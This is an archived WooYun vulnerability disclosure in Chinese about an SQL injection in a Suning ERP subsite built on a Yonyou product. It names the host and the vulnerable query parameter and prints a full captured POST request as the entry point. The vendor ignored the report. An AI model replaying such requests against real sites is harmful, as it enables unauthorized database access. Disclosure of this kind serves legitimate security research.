当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089486

漏洞标题:苏宁易购某分站SQL注入漏洞(用友产品)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: sex is not show

提交时间:2014-12-31 13:24

修复时间:2015-01-05 13:26

公开时间:2015-01-05 13:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-31: 细节已通知厂商并且等待厂商处理中
2015-01-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞存在于http://erp.suning.com.cn/epp/
先注册个账户:test123/testtest
登录进去,点击【入围通知】--查询,并抓包:

POST /epp/core HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://erp.suning.com.cn/epp/core/manageui.jsp?ctrl=nc.web.epp.k0160.EntryPublishController&delegator=nc.web.epp.k0160.EntryPublishDelegator&roleid=0A&pageId=H0K30160
method: POST /epp/core HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Host: erp.suning.com.cn
Content-Length: 604
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=36BB27D5ADE629156151ABA7DFBFFF06.server; JSESSIONID=B42E4B218B630709D26EB7836EE0B7A5.server
type=query&xml=<rpc><dataset id='epp_entrypublishlist_pp_ip_entrypublish' pageindex='0' ><req-parameters><parameter name='$$query_template_condition'>%20bisoverdue%20%3D%20%26apos%3BN%26apos%3B%20*</parameter><parameter name='query_param_values_list'>%7B%3D%2CString%2Cbisoverdue%2CN%7D%2C%7B%3D%2CString%2Cbisfailed%2CN%7D%2C</parameter><parameter name='$$from_query_model'>true</parameter></req-parameters></dataset></rpc>&delegator=nc.web.epp.k0160.EntryPublishDelegator&pageId=H0K30160&pageUniqueId=4a7bb237-51e9-4ff1-8858-3d92ded30ad8&isAjax=1


1.jpg

漏洞证明:

1.jpg

修复方案:

你们懂的

版权声明:转载请注明来源 sex is not show@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-05 13:26

厂商回复:

最新状态:

暂无